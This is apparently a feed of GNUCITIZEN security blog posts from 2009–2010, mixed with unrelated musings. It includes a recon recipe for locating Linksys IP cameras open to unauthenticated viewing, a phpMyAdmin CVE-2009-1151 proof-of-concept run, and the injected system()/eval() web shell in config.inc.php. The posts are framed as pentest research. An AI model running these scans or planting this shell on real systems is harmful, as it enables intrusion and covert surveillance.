We then parse the IP addresses of the subdomains discovered by dnsmap:

$ grep \# dnsmap*.txt | awk '{print $4}' | sort | uniq > ips.txt

Next, we scan for ports that could potentially be used by a Linksys IP camera web server. In this case, we choose TCP ports 80, 1024 and 1025 as candidates:

$ sudo nmap -v -T4 -n -P0 -sS -p80,1024,1025 -iL ips.txt -oA nmap_http_ports.`date +%Y-%m-%d-%H%M%S`

This leaves us with a lot of discovered services, but we don't quite yet know which of them correspond to actual Linksys IP cameras web interfaces. There are many ways to fingreprint the web server of a Linksys IP camera. In this case we chose to create our own amap response signature, and then scan the open ports with amap.

Before amap is capable of identifying our target Linksys IP cams, the following response signature needs to be added to appdefs.resp, and amap then needs to be recompiled. Otherwise amap won't take the new signature into account:

http-linksys-cam::tcp::^HTTP/.*\nServer: thttpd/.*Accept-Ranges: bytes.*WVC

Please note that the previous amap response signature was only tested against the WVC54GCA and WVC80N Linksys IP camera models. So I'm not sure if it will work against other models. You've been warned!

Once recompiled, amap can be used to identify Linksys IP cameras from nmap's open ports results.

$ amap -i nmap_http_ports.2010-02-22-102001.gnmap -R -S -o amap_results.`date +%Y-%m-%d-%H%M%S`

We finally parse the IP addresses and open ports for all discovered Linksys IP cameras:

$ grep http-linksys-cam amap_results.2010-02-22-102253 | awk '{print $3}' | cut -d \/ -f1
x.x.167.245:1024
x.x.228.231:1025
x.x.228.231:80
x.x.64.22:80
x.x.206.70:1024
x.x.31.4:1024
x.x.164.28:1024
[snip]

At this point we have accomplished the task of creating a list of Linksys IP cameras without resorting to search engines or scanning random IP addresses. In order to discover more Linksys cameras, a more comprehensive wordlist would need to be used with dnsmap.

Of course, even further automation would be possible. For instance, an attacker may wish to programmatically identify which Linksys cameras from the previous list allowing video viewing to unauthenticated users:

$ amapfile=amap_results.2010-02-22-102253;for i in `grep http-linksys-cam $amapfile | awk '{print $3}' | cut -d \/ -f1`;do url="http://$i/img/main.cgi?next_file=main.htm";if curl --connect-timeout 2 -s -I --url $url | grep ^"HTTP/1.1 501">/dev/null;then echo $url;fi;done;
x.x.206.70:1024/img/main.cgi?next_file=main.htm
x.x.105.221:1024/img/main.cgi?next_file=main.htm
x.x.105.221:80/img/main.cgi?next_file=main.htm
x.x.181.195:1024/img/main.cgi?next_file=main.htm
x.x.243.154:1024/img/main.cgi?next_file=main.htm
x.x.243.154:1025/img/main.cgi?next_file=main.htm
x.x.30.196:1025/img/main.cgi?next_file=main.htm
[snip]

In addition to automatically checking for anonymous video viewing on all cameras found, other tasks such as checking for default credentials (admin/admin) could also be scripted, although this will NOT be included in this post (or any other at GNUCITIZEN).

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Dnsmap v0.30 is now out!

Sat, 20 Feb 2010 21:08:48 +0000

After working on dnsmap for a few months whenever time allowed, I decided there were enough additional goodies to make version 0.30 a new public release. Let me just say that a lot of the bugs that have been fixed, and features that have been added to this version would not be possible without the feedback from great folks such as Borys Lacki (www.bothunters.pl), Philipp Winter (7c0.org) and meathive (kinqpinz.info). Thanks guys, your feedback was highly valuable to me.

New Features

Anyways, the following are some of the new features included:

IPv6 support
Makefile included
delay option (-d) added. This is useful in cases where dnsmap is killing your bandwidth
ignore IPs option (-i) added. This allows ignoring user-supplied IPs from the results. Useful for domains which cause dnsmap to produce false positives
changes made to make dnsmap compatible with OpenDNS
disclosure of internal IP addresses (RFC 1918) are reported
updated built-in wordlist
included a standalone three-letter acronym (TLA) subdomains wordlist
domains susceptible to same site scripting are reported
completion time is now displayed to the user
mechanism to attempt to bruteforce wildcard-enabled domains
unique filename containing timestamp is now created when no specific output filename is supplied by user
various minor bugs fixed

For those who have never used dnsmap, dnsmap is a command line tool originally released in 2006 which helps discover target subdomains and IP ranges during the initial stages of an infrastructure pentest. dnsmap is a passive(ish) discovery tool meant to be used before an actual active attack. It’s an alternative to other discovery techniques such as whois lookups, scanning large IP ranges, etc … Run dnsmap and you should be able spot netblocks of a target organization in a relatively short period of time.

Dnsmap is open source and is known to work on Linux, FreeBSD and Windows using Cygwin, although it has mostly been tested on Linux.

The major drawback is lack of multi-threading support, which I’m hoping will be included in the next public release. Life is busy these days, but I’ll try to spend some time on this project when time allows and inspiration is available!

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Leadership Lessons from Dancing Guy

Mon, 15 Feb 2010 20:45:18 +0000

What lessons can we learn from the crazy dancing guy?

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Augmented-reality Maps

Sun, 14 Feb 2010 09:11:32 +0000

Well, augmented-reality is pretty much one of the hot topics these days. Here is a video of Blaise Aguera y Arcas demoing the new feature that come in MS Bing Maps.

Although some of the feature look like a full copy of google maps, it nice to see that MS made the effort to go further to do more.

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Ed Catmull on “Keep Your Crises Small”

Sat, 13 Feb 2010 16:13:41 +0000

I stumbled upon the following video by browsing twitter. I find it interesting and quite enlightening.

Pixar is truly remarkable company and there is a lot one can learn from them.

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Was Huxley right?

Sun, 03 Jan 2010 10:19:47 +0000

I stumbled upon the following cartoon on twitter. I have read “1984” but not “Brave New World“. Will be visiting the local library soon.

Some interesting stuff!

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Working Hard is Overrated?

Mon, 12 Oct 2009 15:45:40 +0000

I often hear about success stories where the direct cause for the success is someone’s hard work and persistence. Although in my mind persistence is important, it seems that hard work is seriously overrated according to the founders of Flickr and a bunch of neuroscientists, as reported here and here. Now, this is an idea I fully support.

Here is what Caterina Fake has to say about working hard:

We agreed that a lot of what we then considered “working hard” was actually “freaking out”. Freaking out included panicking, working on things just to be working on something, not knowing what we were doing, fearing failure, worrying about things we needn’t have worried about, thinking about fund raising rather than product building, building too many features, getting distracted by competitors, being at the office since just being there seemed productive even if it wasn’t – and other time-consuming activities.

Much more important than working hard is knowing how to find the right thing to work on. Paying attention to what is going on in the world. Seeing patterns. Seeing things as they are rather than how you want them to be. Being able to read what people want. Putting yourself in the right place where information is flowing freely and interesting new juxtapositions can be seen. But you can save yourself a lot of time by working on the right thing. Working hard, even, if that’s what you like to do.

There are a few interesting things we can draw from Caterina’s experience. I’ve organised them in bullet points to be processed easily when it is needed and also added a few things on this subject I found out on my own. So here is the list.

How to Avoid Working Hard

Find the right thing to work on.
Pay attention to what is going on in the world.
Look for patterns.
See things as they are rather than how you want them to be.
Read what people want.
Put yourself in the right place where information is flowing freely and interesting new juxtapositions can be seen.
Never, ever work for work’s sake.
Even when you need to work hard, take a 10 minutes break every 40 minutes.
Take it easy.
Keep it simple.

I know for a fact that these things may sound like nonsense to some of you but there is some truth in them if you choose to embrace this kind of lifestyle.

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Old-school Remote Command Exec Vulnerabilities on Avaya Intuity

Thu, 17 Sep 2009 08:32:47 +0000

Remember those old remote command exec vulns where you had a CGI script such as a perl program which would take input from the client to construct command strings that would then be passed to the shell environment? Well, there were tons of those affecting diagnostic scripts available on the web interface of Avaya Intuity Audix LX.

I successfully tested them on version 1.1, and according to Avaya this is the latest vulnerable version (version 2.0 is NOT affected apparently).

These vulnerabilities, although cool, are not critical since you need to be logged into the interface in order to exploit them. That being said, it could be handy for bypassing restricting imposed by the web GUI and eventually escalate privileges.

Apart from that, there were also the usual client-side bugs such as XSS and CSRF which are usually expected of an appliance with a web interface.

Details can be found on the attached PDF document.

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

How Derren Brown Predicted the Lottery Numbers

Fri, 11 Sep 2009 23:21:11 +0000

Last Wednesday (09/09/2009) Derren Brown predicted, or at least he made us to believe that he did, five numbers from the lottery draw aired on BBC. For those of you who have no clue what I am talking about, here is a video footage from the show.

How did he do it? I was eager to find out but since he promised to reveal the secret the following Friday, I retained myself from making any guesses until I see the show on TV first. His explanation is out now and as I thought things do not add up as nicely as I would like.

So here is what I think is possible and what is not. Let’s lay out some facts:

You cannot predict a relatively random sequence of numbers – unless it is not random at all. Any claims and proof that the lottery is predictable will make the draw automatically invalid. Not random means that it is fixed. It also means that it is unfair.
The lottery draw is NOT invalid – and therefore it wasn’t predicted as he tried to made us to believe. Derren did get an approval from Camelot to do the show and they were completely aware of what he was up to. Camelot knew that the draw cannot be invalidated because Derren did not and could not get the winning numbers, which leads us to the obvious conclusion that it is only an illusion.
Even if the lottery can be predicted due to being not random, it is very unlikely that Derren has access to resources that can give him the ability to predict the numbers. Think about all technical aspects required to perform a one time guess of something that is the end result of many system properties and variables which are influenced by all kinds of internal and external processes.

The most likely explanation of the trick is usually the most obvious one. The most obvious explanation is that this is a live video montage. Why? Well, why didn’t he do the draw live on stage but inside a studio? The reason for this is because he cannot guess the winning numbers. Only a studio with fixed lighting and scene will let him to create the illusion.

Another peculiar thing about this act is that he essentially gives deliberate hints on exactly how everything works in reality. At the beginning of the show where the trick was explained, he starts by presenting to the audience 3 possible options he could have employed in order to pull off this trick. Here they are:

Fake a ticket
Genuinely guess the winning numbers
Fix the machine

The funny thing is how he disregards the first and most obvious solution by suggesting that it is too obvious and uninteresting and therefore it should be ignored. He quickly moves on on the second possible solution. Now this is basically 99% of the entire show. It is extremely convoluted and full of pseudoscience of all sorts. The last possible solution is of course not possible at all since this will undoubtedly land him in jail, nevertheless he spends a couple of minutes on it at the end of the show to force us to thinker between options 2 and 3 and completely ignore option 1. He is a mentalist after all.

Derren Brown is a magician at the end of the day. The power is not in the trick but in the magician being able to produce an image of something magical happening.

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Skydive

Mon, 07 Sep 2009 19:12:26 +0000

What is the best way to spend a quiet, weekend afternoon? – Jump off a perfectly working plane while 10,000 feet in the air.

On 5th of July 2009, the GNUCITIZEN team and friends came together to perform a skydiving gig. It has been two months since that day but memories are still as clear as yesterday.

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Free Web Application Security Testing Tool

Fri, 07 Aug 2009 08:02:38 +0000

Automated Web Application Security Testing tools are in the core of modern penetration testing practices. You cannot rely 100% on the results they produce, without considering seriously their limitations. However, because these tools are so good at picking the low-hanging fruit by employing force and repetition, they still have a place in our arsenal of penetrating testing equipment.

These tools are not unfamiliar to modern day penetration testers. In fact, there are plenty of them to choose from, ranging from low-grade command line utilities to high-end frameworks. There are plenty of commercial tools as well some of which are a lot better, in terms of features and false-positives rate, when compared to open source alternatives. People often choose what they are more familiar with. I prefer to use tools that are right for the job without discriminating a particular operating system, platform, and style.

Without further ado, I would like to introduce to you yet another tool to compete in the market of automated web application security scanners (not only), released as part of our own Websecurify initiative. The tools is called Websecurify (big surprise) and it is written on the top of common web technologies, which provide significant benefit over other technologies used in open source and commercial alternative products.

Here are some of the key features of Websecurify:

It is 100% open source, GPL, CC product, ready to benefit the open source movement
The engine employs technologies, such as Web Workers, from the latest HTML5 specs
Most of the code is written in JavaScript but many parts can be rewritten or extended with Python, Java and C
The core engine can be taken out from the binary bundles and used as part of self-defending web applications. I will talk about this soon.
The testing and reporting mechanisms are asynchronous. This means that the report is cooking while the test is performed. It also means that decisions are taken immediately, i.e. they are not scheduled.
The tool is cross-platformed thanks to xulrunner
Everything is written with extensibility in mind
It can be extended in pretty much the same way you can extend Firefox and Thunderbird

There are many other features, which I am going to talk about soon.

At the moment the tool is only available as a MacOS DMG package and source code. The Windows and Linux versions will be released soon. In the future we are planning release all platform specific packages at the same time. Now is just an exception as we are mostly interested to get an early feedback. I am sure that that there will be a lot of bugs to fix and features to add/improve before we reach version 1.0.

Version 0.2 can be downloaded from www.websecurify.com or our source code repository.

If you have any feedback or you would like to contribute to this project, please do let us know. We can use any help possible.

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Of Sec Cons and Magstripe Gift Cards

Wed, 22 Jul 2009 09:53:54 +0000

I’ve been meaning to talk about CONFidence and EUSecWest for quite a while, but May was such an intense month for me, that’s hardly left me with any time for other things. I eventually got caught up with other matters, which resulted in me publishing this post about 2 months late.

I’ve been researching, pentesting, and preparing two different presentations which I gave at CONFidence in Krakow, and EUSecWest in London. pdp has also been busy presenting at AusCERT2009. In his Weaponry 2.0, pdp talked about current challenges experienced by pentesters, shared some of his experiments (i.e.: using QEMU) and introduced his Jeriko pentesting environment (NOT framework!).

My CONFidence presentation was on PCI DSS, and credit card theft from a pentester’s perspective. I attempted to explain why it’s possible for unsophisticated criminals to compromise credit card data. I also shared my frustrations with the PCI DSS standards, including some of its current weaknesses.

On the other hand, my EUSecWest presentation was on attacking magstripes gift cards, which apppear to be on the rise in the UK. The core of the research is about cloning (activated) gift cards without physically swiping the magnetic stripes. Trust me when I say that there is a lot of truth on Drago’s tweet regarding this research! My EUSecWest slides have just been recently published. More details will soon be available on a white paper which will be available on Corsaire Research website.

Thanks

I’d like to thank the organizers of these two great conferences, namely Andrzej Targosz from CONFidence and Dragos Ruiu from EUSecWest (plus their respective crews of course).

Also, special thanks to Corsaire who sponsored the time needed to prepare my presentation. I originally started my magstripe gift cards research about 3 years ago, but left it unattended for so long. If it wasn’t for Corsaire, this research wouldn’t have been resumed.

Finally, but not least, thanks to everyone who helped me prepare my presentations such as Jan Fry, Amir Azam, pavlovs_dog, Monsy Carlo, etc.

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept

Tue, 09 Jun 2009 19:03:13 +0000

I couldn’t find any public PoC/exploit for this phpMyAdmin vulnerability, despite it being a serious bug affecting a popular open-source project. I think this vulnerability is a nice reminder that it’s still possible to perform remote command execution these days without relying on SQL injection (i.e.: xp_cmdshell) or a memory corruption bug (i.e.: heap overflow).

All the documentation you need is in the script comments. I recommend you to go through it, before you actually run the script.

After reading the public advisory and patched code, and playing around for a while, I managed to have a working PoC bash script. The script will allow you to remotely run shell commands and PHP code against vulnerable targets. Although in principle the vulnerability sounds quite simple, it actually took me a while to go from advisory to working attack code.

I’m providing the script with the hope that it will help pentesters and security researchers. Please only test the script against your own systems, or systems you have been given permission to pentest! Don’t be evil, it’s not worth it.

Demo

$ ./phpMyAdminRCE.sh
usage: ./phpMyAdminRCE.sh 
i.e.: ./phpMyAdminRCE.sh http://target.tld/phpMyAdmin/

$ ./phpMyAdminRCE.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/phpMyAdminRCE.sh.9217.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:

http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/


http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo();

    please send any feedback/improvements for this script to unknown.pentester gmail.com

$ curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
total 96
drwxr-xr-x   2 root   root  4096 Mar 11 10:12 bin
drwxr-xr-x   3 root   root  4096 May  6 10:01 boot
lrwxrwxrwx   1 root   root    11 Oct 12  2008 cdrom -> media/cdrom
drwxr-xr-x  15 root   root 14300 Jun  5 09:02 dev
drwxr-xr-x 147 root   root 12288 Jun  5 09:02 etc
drwxr-xr-x   3 root   root  4096 Oct 18  2008 home
drwxr-xr-x   2 root   root  4096 Jul  2  2008 initrd
[partial output removed for brevity reasons]

Contents of /config/config.inc.php after our evil code has been successfully injected (injected code shown in bold):


 * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $
 * Date: Tue, 09 Jun 2009 14:13:34 GMT
 */

/* Servers configuration */
$i = 0;

/* Server  (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo
'';system($_GET['c']);echo '';}if($_GET['p']){echo
'';eval($_GET['p']);echo '
';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';

/* End of servers configuration */

?>

Thanks

I’d like to thank Greg Ose for discovering such a cool vuln and doing a nice writeup about the technical details! Also big thanks to str0ke for testing this PoC script and providing such useful feedback!

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Hacking Linksys IP Cameras (pt 5)

Fri, 05 Jun 2009 08:04:55 +0000

This article is a continuation of the following GNUCITIZEN articles: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3), Hacking Linksys IP Cameras (pt 4).

Mounting the filesystem on your workstation

There are many ways to mount the camera’s filesystem using the firmware binary. In this post, we’ll explain one way to mount firmware version v1.00R24 which is the latest available for the WVC54GCA model.

If you were to only use the firmware binary, things could be a bit difficult, as you don’t know the format of the binary at all. However, having the GPL firmware helps a lot as we’ll see next. I emailed Linksys back on Apr 23, 2009 informing them that although the GPL firmware was available on their site for other Linksys products, they hadn’t uploaded the one for the WVC54GCA camera. A few days later, on Apr 27, 2009, Linksys kindly made it available and has been available ever since (the file to download is wvc54gca_v1.00R24.tgz).

Thanks to Lex Landa‘s tips I was able to figure out the parameters required to mount the firmware binary, by analysing the data contained in the ./scripts/wvc54gc_usa_english/combine.cfg file which is included with the GPL firmware:

size = 00400000
file = WVC54GCA.bin
f1_name = loader
f1_start = 00000000
f2_name=loader.ver
f2_start=00007FFE
f3_name=kernel
f3_start=00020000
f4_name=filesystem
f4_start=000E0000
f5_name=PID
f5_start=003FFFB2

I simply focused on the kernel and filesystem parameters. The previous settings show that then kernel starts at 0x20000 (131072 bytes / 128 KB), and the filesystem starts at 0xE0000 (917504 bytes / 896 KB). In order to start dd reading at 0xE0000, we need to keep 7 chunks of 131072 bytes. i.e.:7*131072=917504 bytes=0xE0000 (the position we want)

$ dd if=DYFF08-402-1024.bin bs=131072 of=fs.img skip=7
25+0 records in
25+0 records out
3276800 bytes (3.3 MB) copied, 0.019424 s, 169 MB/s

We then verify that our image file is a valid squashfs filesystem:

$ file fs.img 
fs.img: Squashfs filesystem, little endian, version 3.0, 2216311 bytes, 475 inodes, blocksize: 65536 bytes, created: Fri Nov  9 03:58:52 2007

A finally mount it on our hardrive:

$ sudo mkdir /mnt/test
$ sudo mount -t squashfs fs.img /mnt/test -o ro,loop
$ ls /mnt/test/
bin  dev  etc  lib  mnt  proc  root  sbin  tmp  usr  var

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Breaking Into a Home With an iPhone

Mon, 11 May 2009 11:27:16 +0000

This is going to be one of these quick posts which just makes you think what the information security landscape will be like in 5 years. Before I move on with my commentary, here is a video which is essential for you to watch.

Got the idea? No? Let me explain. What you see in the video above is an application for the iPhone which gives you detailed characteristics of properties (houses) in USA. You can either search the map or just use your GPS coordinates to get information such as price of the house, number of floors, number of rooms, pictures taken from inside the house if the house was part of any register (letting agencies etc.) before you moved in, and other interesting information.

This is the kind of information gathering you see only in the movies. I won’t be surprised if future versions of these kind of applications can pool even essential blueprints which show not only how the house was constructed from architectural point of view but also show the power and gas grids and perhaps even any other wiring such as telephone, coaxial, etc.

All of this information is also available through easily accessible APIs. Perhaps these APIs are not publicly known but anyone who can run a sniffer most certainly can get hold of the URLs and their formats. Now mash this APIs with any other tool such as one that correlates IP address to physical location (not very accurate btw) or better yet a wardriving tool and you have a infowar machine in your pocket that will make any criminal organization proud of.

This was the main purpose of my Web2.0 talk/research from two years ago. Back then I made a very simple analogy which I would like to bring once again. When the email was invented nobody even suspected that it will be used for things such as spam and malware. That was something unimaginable. Today spam is the fastest growing criminal industry and malware delivered over email is the most successful one. In summary, we cannot foresee how a technology will be used/abused. That depends on the imagination of the people.

The same goes for the Web2.0 meme. The more we use it, the more ways we will find to abuse it. However it is also important to say that the more we use it the more accustomed we will become to it. Therefore, when the shit hits the fan there will be very little that we can do.

The reason I am bringing this up is not because I would like to start even more FUD around the Web2.0 mem but it is time for us to stop looking into the technical aspects and start thinking in terms of technologies that affect normal people. Sometimes, we just lack the realism and we fail to spot the obvious problems.

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Extensions at War

Sun, 03 May 2009 08:37:28 +0000

Oh yes, the digital battlefield is taking unusual shapes. The latest manifestation of cyber warfare is a conflict between the Adblock Plus and the NoScript extensions. The story goes that NoScript used some JavaScript tactics and, of course, some obfuscations in order to cripple the Adblock Plus functionalities. This attack was a response to Adblock Plus blocking NoScript ads which you see when you upgrade the extension, which as you know happens quite regularly, don’t know why.

The conflict seems to be resolved now to one degree or another but it is interesting to observe the whole situation and also draw important conclusions. Therefore, I’ve got several points I would like to bring to the table:

More examples of similar nature will follow. Keep an eye on Facebook, Apple AppStore, Firefox and other platforms that allow 3rd-party components to be displayed, downloaded and executed.
As I mentioned before, a malicious piece of JavaScript code (even an obvious obfuscation) can be quite easily smuggled into harmlessly looking Firefox extensions. If I may speculate, the situation is the same for other similar platforms.
Unless platform vendors do something about it, they could become the next hot spot for all sorts of interesting malware.

It is also very interesting to see the extend to which extension developers will go in order to protect their userbase. After all, larger userbase equals more money. And with more people looking to quickly cache in, the battlefield is truly changing for better or worse.

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Exploit Sweatshop

Thu, 30 Apr 2009 12:04:47 +0000

When I was playing/introducing the partial disclosure practice an year and something ago, I did get contacted by numerous dodgy characters willing to buy yet undisclosed vulnerabilities for substantial amount of money. Of course, requests of that nature were kindly ignored. I couldn’t believe that someone was willing to give me so much money for something I virtually spent 2-3 hours maximum to produce.

Later on, during the CONFidence 2008 event in Krakow I met a bunch of people who claimed that they already sell exploits to various UK companies and the figures that they were making were outstanding. To give you a clue, given the pound dollar difference at that time, you could have made 6 times more than what ZDI and other similar programs can offer you for a top range exploit. This is already better than a top salary in UK.

Same year, different event… I saw an interesting presentation by Robert McArdle from Trend Micro. The presentation was titled Fighting web Based, Profit-Driven Threats. On one of his slides, Robert commented that cybercrime is becoming more profitable than the drug cartels. Perhaps you wont be able to make as much money from carding as you might expect but you can do quite well selling visualized stuff, such as exploits and exploit toolkits.

Present times, DojoSec Monthly Briefings… Matthew Watchinski from Sourcefire VRT talked about a PDF 0day spreading around Xmas time. The exploit took a couple of good months for Adobe to fix it. The author sold it for 75K to a unknown 3rd-party in China according to Matthew. The vulnerability was also relatively easy to find and required very little experience to exploit.

All of this leads to the very obvious conclusion which is that at present times cybercrime is a flourishing industry. Soon, there will be even more recruits coming to join the dark-side forces of the cybercrime cartels. They will do it for the money!

No more free bugs you say? I say that you are leading people to become the next generation of cyber menace. Perhaps you forgot that the information security community was built on and thrived because of a simple but fundamental principle: knowledge must be free.

Sell The Bugs

Regardless how good these figures may sound to you, you need to take a step back and think really well what you are getting into. Here are a few points that you need to consider before selling exploits:

Cybercrime is not a joke – If you get caught selling exploits to a dodgy 3rd-party you may end up with a prison sentence longer than the sentence of a child molester. If you live in US or UK you could be charged and treated as a terrorist which will completely destroy not only your life but the life of your closes people.
TAX man problems – Oh Yes! Unjustifiable incomes could get you in trouble with the TAX man. The TAX man will hunt you and hurt you.
Broken legs and other broken parts of the body – You have no idea to whom you are selling to. Tomorrow you may wake up with broken legs and twice as poorer as the day before.
Even worse – People will kill for a lot less than 75K. Keep that in mind.

In my humble opinion, exploit brokerage is a risky business. There is an unquantifiable risk associated with this practice and that is only due to the high price of exploits which are sold today.

Exploit Sweatshop

Nevertheless, it is just silly to believe that no one is producing and selling exploits in a large scale. Do you remember the numerous gaming sweatshops which sprung up like wild mushrooms after the recent heavy rains in 3rd-world countries? I recall seeing a documentary on a typical day in a Chinese WoW sweatshop. I remember I saw a room full of almost naked people, numerous PCs hooked up into a gigantic DIY network spreading across the entire floor. Most of the WoW accounts were fully automated, running from virtualized platforms.

The aim was simple: a) develop many characters in a semi-automated fashion by killing small animals and other things around the WoW world and b) sell the characters plus other artifacts to western buyers for a substantial amount of money. All of this can be achieved for as little as $70 a month per person. This is a remarkable business model which works extremely well.

Similarly, all you need is a bunch of programmers from India, China, or Eastern Europe to code up fuzzers and run them against as many software products as possible. At the end of the day memory corruption exploits a relative easy to detect. All you need is a crash caused by putting far too many 0×41 in a buffer. The crash is already an indication that something is wrong. It requires a bit of manual work to figure out whether the crash is exploitable. From personal experience, and by looking into the work of my peers, it takes approximately 10 days to develop a crash into an exploit. Most of the times, the exploitability factor of a crash is apparent and therefore no time needs to be wasted. Other times, a crash can be archived for future investigation when it could become exploitable given it meets the necessary conditions.

Perhaps you can do all that by paying someone as little as $70 a month as it is the case with WoW sweatshops. That is 3 times less than what I am paying for just hosting. Therefore, I most certainly can afford to hire 3-4 people right now and even double their salaries, but let’s do the maths:

# average exploit price: $5000
# number of people to hire: 5
# average monthly salary: $100
# job specs: write fuzzers

5 * 100 = $500 # a month expenses
5000 / 500 = 10 # months worth of work

Heck, I can even put this bill on my credit card and pay as little as $50 a month. The chances that I will sell an exploit for $5K in the next 10 months are pretty high. $5K is only if I go with a legitimate company. I can probably make 6 times more by selling it to a dodgy 3rd-party. The only thing I need to worry about is the risk.

Some Final Words

Finally, I know that a lot of people are into the security business because of all the romanticism and the myths surrounding the hacker figure. Things look different once you become the hacker and your day job and lifestyle are surrounded by hacking and breaking into systems of any sort. There is nothing romantic about it.

So, don’t get into trouble for the wrong reasons. If you are young and you need advice what to do with your career, contact us or contact any one who has been into this industry long enough to give you a good and sensible advice. Just don’t jump onto the No free bugs! bandwagon.

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Jeriko Group and Source Code Repository

Tue, 28 Apr 2009 06:50:39 +0000

Jeriko moved in its own source code repository which you will be able to find here. There is also a discussion group here, if you feel like using it.

The version inside the new code repository is very different from the version you’ve seen before. The main difference is that while the old version is basically a collection of scripts, the new version implements its own shell (wrapper around bash) which does the heavily lifting and also introduces some funky programming mechanisms. For example, now you can create jeriko scripts like this:

#/usr/bin/env jeriko
# do my jeriko commands here
foreach-input | add-targets
generate-scan-batch | run-in-parallel

This is perhaps the simplest possible script you can write but you see that the jeriko shell could turn into a quite powerful feature. The shell is also a good starting point for many penetration testing jobs as it does some environment checking and preconfigures some defaults for you. The other good news is that you don’t have to learn a new programming language. Your bash skills are good for jeriko too.

Just keep in mind that jeriko is merely an experiment. However, I realize that it has already become quite useful for some people. So, if you enjoy playing with bash scripts, and you you feel adventurous, please join us and make this project happen.

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Hacking Linksys IP Cameras (pt 4)

Sat, 25 Apr 2009 03:28:38 +0000

This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3).

There are two types of vulnerabilities I will be releasing today: disclosure of credentials in client-side source code and multiple XSS.

Disclosure of Credentials in Client-side Source Code

As a consumer of embedded products, I find highly frustrating to see how many devices’ web interfaces return passwords back to the browser within HTML source code. I’ve also seen similar problems in some corporate appliances, but is not such as common problem within the enterprise realm.

Visiting the change admin password page:

/adm/file.cgi?next_file=pass_wd.htm

Causes the current admin password to be returned (just view the source code with your browser):

Visiting the "Wireless Security Page":

